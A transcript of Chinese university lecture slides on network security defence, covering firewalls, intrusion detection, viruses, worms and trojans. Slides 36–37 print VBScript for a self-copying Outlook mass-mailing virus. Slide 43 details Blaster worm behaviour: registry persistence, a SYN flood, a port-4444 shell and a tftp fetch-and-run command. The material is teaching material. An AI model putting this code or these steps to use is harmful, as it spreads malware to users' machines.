1 / 60

第四部分 安全防护

第四部分 安全防护. 主讲教师:陈盈 联系电话: 611117 电子邮箱: ychen222@163.com. 第 4 章 网络安全防护技术. 网络安全防护技术是指为防止网络通信阻塞、中断、瘫痪或被非法控制等以及网络中传输、存储、处理的数据信息丢失、泄露或被非法篡改等所需要的相关技术。

keala
Download Presentation

第四部分 安全防护

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. 第四部分安全防护 主讲教师:陈盈 联系电话:611117 电子邮箱:ychen222@163.com

  2. 第4章 网络安全防护技术 网络安全防护技术是指为防止网络通信阻塞、中断、瘫痪或被非法控制等以及网络中传输、存储、处理的数据信息丢失、泄露或被非法篡改等所需要的相关技术。 本章主要针对常见的网络攻击手段、入侵机制,讨论一些针对性较强的网络安全防护技术,如防火墙、入侵检测及恶意代码防范与响应等。虽然这些技术对防御具体的入侵机制很有效,但毕竟合法系统难以预测攻击者究竟会以什么样的机制实施入侵,攻击者也肯定不会总遵循固定的规则实施攻击,因此需要更具有普遍性的解决方案,进而引入了对入侵检测系统、网络攻击取证与安全审计等方面的讨论。

  3. 4.1 防火墙技术 4.2 入侵检测系统 4.3 恶意代码防范与应急响应 4.4 网络攻击取证与安全审计

  4. 4.1 防火墙技术 4.1.1防火墙概述 防火墙是一种综合性较强的网络防护工具,涉及到计算机网络技术、密码技术、软件技术、安全协议、安全标准、安全操作系统等多方个面。它通常是一种软件和硬件的组合体,用于网络间的访问控制,防止外部非法用户使用内部网络资源,保护内部网络的设备不被破坏,防止内部网络的敏感数据被窃取。防火墙具有过滤进出网络的数据、管理进出网络的访问行为、禁止非法访问等基本功能。

  5. 4.1 防火墙技术 4.1.1防火墙概述 • 1.防火墙的基本概念 所谓防火墙是指设置在不同网络或网络安全域之间的一系列部件的组合。它是不同网络或网络安全域之间信息的唯一出入口,能根据部门的安全策略控制(允许、拒绝、监测)出入网络的数据流,且本身具有较强的抗攻击能力。 在物理组成上,防火墙系统可以是路由器,也可以是个人计算机、主机系统,或一批向网络提供安全保障的软硬件系统。在逻辑上,防火墙是一个分离器、一个限制器,也可以是一个分析器。

  6. 4.1 防火墙技术 4.1.1防火墙概述 • 1.防火墙的基本概念 图4-1 防火墙逻辑示意图

  7. 4.1 防火墙技术 4.1.1防火墙概述 • 2.防火墙的主要功能 1)通过防火墙可以定义一个阻塞点(控制点),过滤进、出网络的数据,管理进、出网络的访问行为,过滤掉不安全服务和非法用户,以防止外来入侵。 2)控制对特殊站点的访问,例如可以配置相应的WWW和FTP服务,使互联网用户仅可以访问此类服务,而禁止对其它系统的访问。 3)记录内外通信的有关状态信息日志,监控网络安全并在异常情况下给出告警。 4)可用作IPSec的平台,如可以用来实现虚拟专用网(VPN)。

  8. 4.1 防火墙技术 4.1.1防火墙概述 • 3.防火墙的实现原则 防火墙是一个矛盾统一体,它既要限制数据的流通,又要保持数据的流通。实现防火墙时可遵循两项基本原则: 1)一切未被允许的都是禁止的。根据这一原则,防火墙应封锁所有数据流,然后对希望提供的服务逐项开放。这种方法很安全,因为被允许的服务都是仔细挑选的;但限制了用户使用的便利性,用户不能随心所欲地使用网络服务。 2)一切未被禁止的都是允许的。根据这一原则,防火墙应转发所有数据流,然后逐项屏蔽可能有害的服务。这种方法较灵活,可为用户提供更多的服务,但安全性差一些。 由于这两种防火墙实现原则在安全性和可使用性上各有侧重,实际中,很多防火墙系统在两者之间做一定的折衷。

  9. 4.1 防火墙技术 4.1.1防火墙概述 • 4.防火墙的主要类型 (1)包过滤防火墙 (2)应用代理防火墙 (3)电路层防火墙 (4)状态检测防火墙

  10. 4.1 防火墙技术 4.1.2 防火墙技术原理 自采用包过滤技术的第一代防火墙到现在,防火墙技术经历了包过滤、应用代理、状态检测及深度检测技术等发展阶段,目前,已有多种防火墙技术可供网络安全管理员选择使用。 • 1.包过滤技术 简单的说,包过滤(Packet Filtering)就是在网络层,依据系统事先设定的过滤规则,检查数据流中的每个包,根据包头信息来确定是否允许数据包通过。

  11. 4.1 防火墙技术 4.1.2 防火墙技术原理 • 1.包过滤技术 图 4-2 包过滤工作原理

  12. 4.1 防火墙技术 4.1.2 防火墙技术原理 • 2.代理服务器技术 所谓代理服务器是指代表内网向外网服务器进行连接请求的服务程序,其基本工作原理是:代理服务器监听网络内部客户机的服务请求,当一个连接到来时,首先进行身份和授权访问等级认证,并根据安全策略决定是否中转。当请求符合安全策略时,代理服务器上的客户机进程代表这个请求向真正的服务器发出请求,然后将服务器的响应数据转发给内部客户机。

  13. 4.1 防火墙技术 4.1.2 防火墙技术原理 • 3.状态检测技术 其关键是在防火墙的核心部分建立状态连接表,并将进出网络的数据包当成一个一个的会话,利用状态连接表跟踪每一个会话状态。状态检测防火墙不仅根据规则表对每一个数据包进行检查,而且还考虑数据包是否符合会话所处的状态,通过对高层的信息进行某种形式的逻辑或数学运算,提供对传输层的控制。

  14. 4.1 防火墙技术 4.1.2 防火墙技术原理 • 3.状态检测技术 如表4-3所列,每个当前建立的连接都记录在状态连接表里,如果一个数据包的源端口是系统内部的一个介于1024和14383之间的端口,而且它的信息与状态连接表里的某一条记录相符,包过滤器才允许它进入。 表4-3 状态检测防火墙的状态连接表示例

  15. 4.1 防火墙技术 4.1.3 防火墙的体系结构 目前,防火墙的体系结构有双重宿主主机体系结构、屏蔽主机体系结构、屏蔽子网体系结构,以及新型混合防火墙体系结构等类型。 1.双重宿主主机体系结构

  16. 4.1 防火墙技术 4.1.3 防火墙的体系结构 2.屏蔽主机体系结构 图4-8 屏蔽主机防火墙体系结构

  17. 4.1 防火墙技术 4.1.3 防火墙的体系结构 • 3.屏蔽子网体系结构 图4-9 屏蔽子网防火墙体系结构

  18. 4.1 防火墙技术 4.1.4 防火墙的部署应用实例 1.区域分割的层叠方式 图4-10 防火墙系统的层叠方式

  19. 4.1 防火墙技术 4.1.4 防火墙的部署应用实例 2.区域分割的三角方式 图4-11 以区域分割的三角方式部署防火墙

  20. 4.1 防火墙技术 4.1.4 防火墙的部署应用实例 3.防火墙存在的缺陷 1)防火墙不能防御不经过防火墙的攻击。 2)防火墙不能防止感染了病毒的软件或文件的传输。这只能在每台主机上装反病毒软件。 3)防火墙只能用来防御已知的威胁,不能防御全部的威胁。 4)防火墙不能防御恶意的内部用户。

  21. 4.2 入侵检测系统 4.2.1 何谓入侵检测系统 入侵是指未经授权蓄意尝试访问、篡改数据,使网络系统不可使用的行为。入侵检测(Intrusion Detection),顾名思义便是对入侵行为的发觉,即在计算机网络系统中的若干关键点搜集信息,通过对所收集信息的分析发现网络系统中是否有违反安全策略的行为和遭到攻击的迹象。 入侵检测的目的主要是:①识别入侵者;②识别入侵行为;③检测和监视以实施的入侵行为;④为对抗入侵提供信息,阻止入侵的发生和事态的扩大。 进行入侵检测的软件、硬件组合便是入侵检测系统。

  22. 4.2 入侵检测系统 4.2.1 何谓入侵检测系统 1.入侵检测系统的基本结构 图4-12 入侵检测系统的基本结构

  23. 4.2 入侵检测系统 4.2.1 何谓入侵检测系统 2.入侵检测系统的主要功能 入侵检测系统作为一种积极主动的安全防护工具,提供了对内部攻击、外部攻击和误操作的实时防护,在网络系统受到危害之前进行报警、拦截和响应。一般说来,IDS应具有的功能为:①监控、分析用户和系统的活动;②核查系统配置和漏洞;③评估关键系统和数据文件的完整性;④对异常行为统计分析,识别攻击的活动模式并报警;⑤对操作系统进行审计、跟踪管理。

  24. 4.2 入侵检测系统 4.2.1 何谓入侵检测系统 3.入侵检测的过程 (1)信息收集 入侵检测的第一步是信息收集,收集的内容包括系统、网络、数据及用户活动的状态和行为。 (2)数据分析 对收集到的数据进行分析是入侵检测系统的核心工作。按照数据分析的方式,一般有三种手段:①模式匹配。②统计分析。③完整性分析。 (3)结果处理 通过数据分析发现了入侵迹象时,入侵检测系统把分析结果记录在日志文件中,并产生一个告警报告,同时还要触发警报到控制台。

  25. 4.2 入侵检测系统 4.2.1 何谓入侵检测系统 4.入侵检测系统的分类 (1)按照入侵检测的体系结构划分 基于主机的入侵检测系统、基于网络的入侵检测系统和分布式入侵检测系统。 (2)按照入侵检测的时间分类 实时入侵检测系统和事后入侵检测系统两种类型。

  26. 4.2 入侵检测系统 4.2.2 入侵检测系统的分析技术 1.异常入侵检测技术 (1)基于统计学方法的异常分析 (2)基于计算机免疫技术的异常检测方法 (3)基于数据挖掘的异常检测方法 2.特征分析检测技术 (1)模式匹配 (2)专家系统

  27. 4.2 入侵检测系统 4.2.3 入侵检测系统的设置与部署 1.网络入侵检测系统的设置步骤

  28. 4.2 入侵检测系统 4.2.3 入侵检测系统的设置与部署 2.入侵检测系统部署(1)基于网络入侵检测系统的部署 一般说来,可以将入侵检测系统的部署点划分为外网入口、DMZ区、内网主干和关键子网4个部署点,如图4-14所示是一个部署入侵检测系统的典型方案。

  29. 4.3 恶意代码防范与应急响应 4.3.1 何谓恶意代码与应急响应 何谓恶意代码?它们从哪里来?是如何传播的?应该如何防止?如果已经被恶意代码侵害,又应该如何处理?这些都是恶意代码防范与应急响应所要讨论的重要内容。 1.恶意代码的含义 所谓恶意代码(Malicious Code)实质上是指一种在一定环境下可以独立执行的计算机程序或者嵌入到其它程序中的代码,也称之为恶意软件(Malicious Software)。恶意代码能在不被用户察觉的情况下启动运行,破坏计算机系统的安全性和完整性。

  30. 4.3 恶意代码防范与应急响应 4.3.1 何谓恶意代码与应急响应 1.恶意代码的含义 (1)恶意代码的分类 1)不感染的依附性恶意代码。这类恶意代码主要有木马(Trojan)、逻辑炸弹(Logic Bomb)及后门(Back Door)或者陷门(Trap Door)等。 2)不感染的独立性恶意代码。这类恶意代码主要有点滴器(Dropper)、繁殖器(Generator)、恶作剧(Hoax)等。 3)可感染的依附性恶意代码。这类恶意代码主要是指一段依附在其它程序上、可以进行自我繁殖的计算机病毒。 4)可感染的独立性恶意代码。这类恶意代码主要有蠕虫(Worm)、网页恶意代码、计算机细菌(Germ)及僵尸网络等。

  31. 4.3 恶意代码防范与应急响应 4.3.1 何谓恶意代码与应急响应 1.恶意代码的含义 (2)恶意代码的传播 一般情况下,恶意代码有三种传播途径: 一是利用操作系统漏洞或者软件漏洞传播;二是通过浏览器传播; 三是利用用户的信任关系传播。

  32. 4.3 恶意代码防范与应急响应 4.3.1 何谓恶意代码与应急响应 2.什么是应急响应 所谓应急响应(Incident Response或Emergency Response)通常指一个组织为了应对各种突发事件的发生所做的准备,以及在突发事件发生后所采取的措施和行动。

  33. 4.3 恶意代码防范与应急响应 4.3.2 网络病毒及其防范 1.网络病毒的概念 (1)计算机病毒的定义 从广义上讲,凡能够引起计算机系统故障,破坏计算机数据的程序统称为计算机病毒。 简言之,计算机病毒就是一种恶意代码,即可感染的依附性恶意代码。它隐藏在计算机系统资源中,能影响系统正常运行,并通过系统资源共享等途径进行传播。 计算机病毒一般由三部分组成:①主控程序负责病毒程序的组装和初始化工作;②传染程序将病毒程序传染到其它的可执行程序上去;③破坏程序实现病毒程序编制者的破坏意图。

  34. 4.3 恶意代码防范与应急响应 4.3.2 网络病毒及其防范 1.网络病毒的概念 (2)网络病毒的含义 若按病毒传播方式划分,可以将其分为单机病毒和网络病毒两类。所谓网络病毒是指,通过网络通信机制,引起计算机系统、网络系统故障,破坏网络通信及数据的恶意代码。网络病毒除具有计算机病毒的一般特性之外,还呈现出如下一些新的特点。 1)传染速度快。 2)清除难度大。 3)破坏性强。

  35. 4.3 恶意代码防范与应急响应 4.3.2 网络病毒及其防范 2.计算机病毒的结构及工作机制 (1)计算机病毒的结构 计算机病毒的基本特征是引导、触发、传染和破坏,因此一个计算机病毒一般由引导模块、触发模块、传染模块和破坏模块组成。 图4-14 计算机病毒工作机制示意图

  36. 4.3 恶意代码防范与应急响应 4.3.2 网络病毒及其防范 3.典型邮件病毒代码分析 • 通过Outlook传播的病毒基本上用VBScript语言编写而成,其自我复制原理也是利用程序本身的脚本内容复制一份到一个临时文件,然后再在传播环节将其作为附件发送出去。例如,使用如下两行代码就可以将自身复制到C盘根目录下的temp.vbs文件中。 • Set fso=CreateObject(“Scripting.FileSystemObject”) • Fso.GetFile(WScript.ScriptFullName).Copy(“C:\\temp.vbs”) • 其中,第一行创建一个文件系统对象。第二行前面是打开这个脚本文件,WScript.ScriptFullName用于指明是这个程序本身,即一个完整的路径文件名;用GetFile函数获得这个文件;使用Copy函数将这个文件复制到C盘根目录下的temp.vbs文件中。

  37. 4.3 恶意代码防范与应急响应 4.3.2 网络病毒及其防范 3.典型邮件病毒代码分析 • 如下的代码段可实现邮件病毒的传播: • Set ola=CreateObject(“Outlook.Application”) • On Error Resume Next • for i=1 to 40 • Set Mail=ola.CreateItem(0) • Mail.to=ola.GetNameSpace(“MAPI”).AddressLists(1).AddressEntries(x) • Mail.Subject=“Betreffder E-Mail” • Mail.Body=“Textder E-Mail” • Mail.Attachments.Add(“C:\\temp.vbs”) • Mail.Send • Ola.Quit

  38. 4.3 恶意代码防范与应急响应 4.3.2 网络病毒及其防范 4.病毒的防范措施 1)从管理上,建立严格的计算机使用、管理制度,执行有效的应用和操作规范;对外来软件和存储介质进行病毒检查,严禁使用来历不明的软件;保护好随机携带的原始资料和软件版本,建立安全的资料备份制度;对计算机定期进行病毒检测,一旦发现病毒立即隔离,防止扩散,并报告主管部门;购买计算机时,必须考虑对计算机病毒的防范。 2)从技术上,配备病毒检测程序,及时发现并消除病毒;制订病毒侵入应急技术措施,减少病毒造成的损失;严格保护硬盘,设置禁写保护,防止非法装载硬盘;采取加密手段,防止病毒入侵;研制“病毒疫苗”程序,增强程序的防病毒能力;创建安全操作系统,防止病毒破坏。 3)在法律上,制订相应法规,对制造、施放和出售病毒的行为,给予严惩。

  39. 4.3 恶意代码防范与应急响应 4.3.3 网络蠕虫 1.蠕虫病毒 蠕虫(Worm),从广义上来讲一般认为是一种通过网络传播的恶性病毒,但蠕虫病毒与一般病毒有很大区别,蠕虫是一种通过网络传播的恶性病毒,具有病毒的一些共性,如传播性、隐蔽性、破坏性等;同时又有自己的一些特征,如不利用文件寄生(只存在于内存中),对网络造成拒绝服务等。 按照攻击对象不同,可以将蠕虫病毒分为两类:一类是面向企业用户和局域网的蠕虫,主要利用系统漏洞主动进行攻击破坏。这类蠕虫病毒以“红色代码”、“尼姆达”以及“SQL蠕虫王”等为代表。另一类是针对个人用户的蠕虫,通过网络(主要是电子邮件、恶意网页等形式)进行传播。这类蠕虫病毒以“爱虫”、“求职信”等病毒为代表。

  40. 4.3 恶意代码防范与应急响应 4.3.3 网络蠕虫 1.蠕虫病毒 蠕虫的工作过程一般为: ①扫描:蠕虫开始随机选取某一段IP地址,然后对这一IP地址段上的主机进行扫描,探测存在漏洞的主机。有时可能会不断重复这一扫描过程。这样,随着蠕虫的传播,新感染的主机也开始进行这种扫描。网络上的扫描包就越多。 ②攻击:当蠕虫扫描到网络中存在漏洞的主机后,就开始利用自身的破坏功能获取主机的管理员权限。 ③利用原主机与新主机的交互,将蠕虫程序复制到新主机并启动。

  41. 4.3 恶意代码防范与应急响应 4.3.3 网络蠕虫 2.蠕虫程序的功能结构和传播流程 图4-17 蠕虫程序的功能结构模型

  42. 4.3 恶意代码防范与应急响应 4.3.3 网络蠕虫 2.蠕虫程序的功能结构和传播流程 图4-18 蠕虫程序传播流程

  43. 4.3 恶意代码防范与应急响应 4.3.3 网络蠕虫 3.典型蠕虫病毒实例分析 冲击波蠕虫病毒执行流程如下: 1)病毒运行时首先在内存中建立一个名为:“msblast.exe”的进程,该进程就是活的病毒体。病毒还会修改注册表,在“HKEY_LOCAL_MACH INE\SOFTWARE\Microsoft\Windows\CurrentVersion \Run”中添加键值:“windows autoupdate = msblast.exe”,这样在每次启动系统时,病毒就会自动运行。 2)判断BILLY互斥体,如果已经感染,蠕虫退出。 3)以20秒为间隔,检测一次网络连接状态。若未连入网络,永远循环。 4)判断日期大于15号、月份大于8,蠕虫启动syn flood攻击某网站更新站点,例如windowsupdate.com的Web服务端口80。 5)首先感染子网IP地址,然后随机感染外网IP地址。 4)感染其它主机,若缓冲区溢出成功,远程主机会在4444端口监听,提供cmd shell服务;然后本地开启tftp(49端口)服务,接着利用连接4444端口socket发送命令tftp - i ip GET msblast.exe,最后执行get后的程序。

  44. 4.3 恶意代码防范与应急响应 4.3.3 网络蠕虫 4.网络蠕虫的防范措施 (1)修补系统漏洞 (2)删除蠕虫要利用的程序 (5)接种疫苗 (4)采用入侵检测技术 (3)配置合适的网络防火墙

  45. 4.3 恶意代码防范与应急响应 4.3.3 网络蠕虫 5.网络蠕虫的清除方法 (1)用杀毒软件查杀 (2)手工清除 ①先拨掉网线,启动任务管理器,在其中查找msblast.exe进程,找到后在进程上单击右键,选择[结束进程]。 ②用文件搜索的方法查找到Msblast.exe后删除。 ③修改注册表,点[开始]菜单中的[运行],输入regedit后点确定运行注册表编辑器,找到“HKEY_LOCAL_MACH INE\Software\Microsoft\Windows\CurrentVersion\Run”后,在右边找到键值“windows autoupdate=msblast.exe”,将其删除。 ④重启计算机并打上补丁,以免计算机再次遭受蠕虫攻击。 ⑤连接网线,恢复正常工作。

  46. 4.3 恶意代码防范与应急响应 4.3.4 特洛伊木马 1.木马的含义 简单地讲,木马是一种带有恶意性质的远程控制软件。一般的木马包括一个服务器程序和一个客户机程序。服务器程序负责打开攻击的通道,放置在被入侵的计算机中,就像一个内奸特务。通常所说的木马程序即是服务器程序。客户机程序放在木马控制者的计算机中,负责攻击目标主机。

  47. 4.3 恶意代码防范与应急响应 4.3.4 特洛伊木马 2.木马系统的关键技术 (1)远程启动技术 1)注册表启动。 2)Windows系统服务。 3)系统配置文件。 4)修改文件关联。 (2)自动隐藏技术 1)进程插入。 2)核心态隐藏。 3)隐蔽通信技术。 4)反弹式木马技术。 (3)自动加载技术 (4)输入设备控制 (5)远程文件管理

  48. 4.3 恶意代码防范与应急响应 4.3.4 特洛伊木马 3.木马自动加载程序代码示例

  49. 4.3 恶意代码防范与应急响应 4.3.4 特洛伊木马 4.木马病毒的检测 (1)检查网络通信流量 (2)查看进程与网络连接 (3)检查启动项 (4)检查系统账户 (5)查看进程加载的服务 (4)使用病毒检测软件查杀木马

  50. 4.3 恶意代码防范与应急响应 4.3.5 网页恶意代码 网页恶意代码又称为网页病毒,主要指某些网站使用的恶意代码。它用脚本语言来实现相关功能,利用软件和操作系统安全漏洞通过网页进行传播。网页恶意代码依赖于脚本引擎解释执行。 1.网页恶意代码的特点及安全威胁 网页恶意代码的常见危害形式有: 1)更改主页设置; 2)隐藏“开始”菜单的命令; 3)隐藏“我的电脑”中的硬盘; 3)隐藏桌面图标; 4)禁用DOS程序; 5)修改登录窗口; 4)修改IE浏览器的标题,即修改浏览器最上方的蓝色标题栏中的文字,在上面加入广告或宣传文字。

More Related